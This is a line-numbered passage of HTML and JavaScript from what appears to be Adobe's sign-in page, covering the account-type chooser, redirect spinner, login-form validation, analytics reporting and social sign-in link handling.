  262. <div class="account-chooser-content">
  263. <div class="container">
  264. <div id="chooser_title" role="heading" class="row">
  265. <h1 class="page-title">Choose an account for</h1>
  266. </div>
  267. <div class="row mod-spaced">
  268. <strong class="account-chooser-email" id="checked_user_email"></strong>
  269. </div>
  270. <div class="account-chooser-account-list" role="menu" tabindex="-1" aria-labelledby="chooser_title">
  271. <div id="adobeid-option" class="account-chooser-option adobeid item" data-usertype="ind" role="menuitem" tabindex="0">
  272. <div class="account-chooser-arrow"></div>
  273. <div class="account-chooser-account-type">Adobe ID</div>
  274. <div class="account-chooser-account-type-description">Personal account</div>
  275. </div>
  276. <div id="enterpriseid-option" class="account-chooser-option enterprise item" data-usertype="ent" role="menuitem" tabindex="0">
  277. <div class="account-chooser-account-type">Enterprise ID</div>
  278. <div class="account-chooser-account-type-description">Company or school account</div>
  279. <div class="account-chooser-arrow"></div>
  280. </div>
  281. </div>
  282. <div class="account-chooser-footer">
  283. <div class="row mod-top-spaced">
  284. Need help?&nbsp;
  285. <a href="/renga-idprovider/pages/newwindow?new_url=http%3A%2F%2Fwww.adobe.com%2Fgo%2Flearn-more-enterprise-id" id="learn_more_enterprise">Learn more.</a>
  286. </div>
  287. <div class="row">
  288. <a href="#" class="close" role="button">Cancel</a>
  289. </div>
  290. </div>
  291. </div>
  292. </div>
  293. </div>
  294. <div class="chooser_screen account-chooser-spinner binded" id="external_redirect_waiter">
  295. <div class="container">
  296. <div class="account-chooser-spinner-content">
  297. <div id="spinner_square" class="overlay-spinner"></div>
  298. <div class="row mod-top-spaced">
  299. <span>Redirecting you to sign in…</span><br>
  300. </div>
  301. <div class="row chooser_footer">
  302. <a href="#" class="cancel">Cancel</a>
  303. </div>
  304. </div>
  305. </div>
  306. </div>
  307. </div>
  308. </div>
  309. <script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_body.js"></script>
  310. <!--[if lte IE 9]>
  311. <script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/ie.js"></script>
  312. <![endif]-->
  313. <script>
  314. jQuery.validator.addMethod("validUsername", function (value, element) {
  315. return this.optional(element) || !value.match(new RegExp("^[^@]*@+$"));
  316. }, "Enter a valid email address");
  317. $(document).ready(function () {
  318. $(".loginform").each(function () {
  319. $(this).validate({
  320. errorPlacement: function (error, element) {
  321. error.attr("aria-hidden", "true");
  322. var fieldset = $(element).closest('fieldset');
  323. if (fieldset) {
  324. error.appendTo(fieldset);
  325. } else {
  326. error.insertAfter(element);
  327. }
  328. element.attr("aria-invalid", "true");
  329. },
  330. invalidHandler: function (event, validator) {
  331. $(validator.errorList).each(function (id, error) {
  332. switch (error.element.name) {
  333. case "username":
  334. if (error.rule === "required") {
  335. scReport('SignIn:Error_EmptyEmail');
  336. }
  337. break;
  338. case "password":
  339. if (error.rule === "required") {
  340. scReport('SignIn:Error_EmptyPassword');
  341. }
  342. break;
  343. }
  344. });
  345. $('.error.backend').remove();
  346. },
  347. rules: {
  348. username: {
  349. required: true,
  350. email: false,
  351. maxlength: 100,
  352. validUsername: true
  353. },
  354. password: {
  355. required: true,
  356. minlength: 6,
  357. maxlength: 100
  358. }
  359. },
  360. messages: {
  361. username: {
  362. required: "Enter your email",
  363. maxlength: "A maximum of 60 characters are allowed for the Adobe ID."
  364. },
  365. password: {
  366. required: "Enter your password",
  367. minlength: "The password is too short",
  368. maxlength: "The password is too long"
  369. }
  370. }
  371. });
  372. });
  373. $('input[type="hidden"][name="remember_me"]').remove();
  374. $("input[name='username']").change(function () {
  375. this.value = $.trim(this.value);
  376. });
  377. $(".forgotpassword").on("mousedown touchstart",function(event){
  378. var $this = $(this);
  379. // this will kick in before the spinner component and replace the href of the link
  380. var userFieldVal = $this.closest('form').find('input[name=username]').val();
  381. var href = $this.attr('href');
  382. if (components.utils.isEmail(userFieldVal)) {
  383. $this.attr('href', href.replace(/[&\?]puser=[^&]+/, '') + '&puser=' + window.encodeURIComponent(userFieldVal));
  384. }
  385. })
  386. });
  387. var views = {
  388. "enterprise": {
  389. "onbeforeswitch": function () {
  390. $(".loginform").each(function () {
  391. $(this).validate().resetForm();
  392. });
  393. components.utils.switchLogo("enterprise");
  394. //if switcher is enabled, swithcing the ui form the link should not pass the email from one ui to another
  395. $("#enterprise_username").val("");
  396. $("#enterprise_password").val("");
  397. },
  398. "onafterswitch": function () {
  399. $(".backend").remove();
  400. document.title = "Sign in - Enterprise ID";
  401. $("#enterprise_username").focus();
  402. }
  403. },
  404. "adobeid": {
  405. "onbeforeswitch": function () {
  406. $(".loginform").each(function () {
  407. $(this).validate().resetForm();
  408. });
  409. components.utils.switchLogo("adobeid");
  410. $("#adobeid_username").val("");
  411. $("#adobeid_password").val("");
  412. },
  413. "onafterswitch": function () {
  414. $(".backend").remove();
  415. document.title = "Sign in - Adobe ID";
  416. $("#adobeid_username").focus();
  417. }
  418. }
  419. }
  420. </script>
  421. <script>
  422. // disable form fields on submit
  423. $('.loginform').on('submit', function() {
  424. var $form = $(this);
  425. if ($form.valid()) {
  426. // make all fields readonly while submitting a form
  427. $('input', $form).attr('readonly', 'true');
  428. }
  429. });
  430. </script>
  431. <script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_capsindicator.js"></script>
  432. <script>
  433. $(document).ready(function () {
  434. $("#facebook-sign-in-button, #google-sign-in-button").on("click", function(){
  435. var rememberMeChecked = $("#adobeid_signin").find('input[name="remember_me"]').is(":checked");
  436. var rememberMeParam = "remember_me=" + !!rememberMeChecked;
  437. var rememberMeRegex = /([?&])(remember_me=[^&$]*)/;
  438. var href = '';
  439. if (rememberMeRegex.test(this.href)) {
  440. href = this.href.replace(rememberMeRegex, "$1" + rememberMeParam);
  441. } else {
  442. href = this.href + "&" + rememberMeParam;
  443. }
  444. this.setAttribute("href", href);
  445. });
  446. });
  447. </script>
  448. <script>/* <susi-9057> */
  449. $("#different-email-back").attr("onclick","scReport('SignIn:onClick_UnifiedCheckoutDifferentEmail', null, this)");
  450. $("#unified-checkout-back").attr("onclick","scReport('SignIn:onClick_UnifiedCheckoutBack', null, this)");
  451. /*</susi-9057>*/
  452. </script>
  453. </body></html>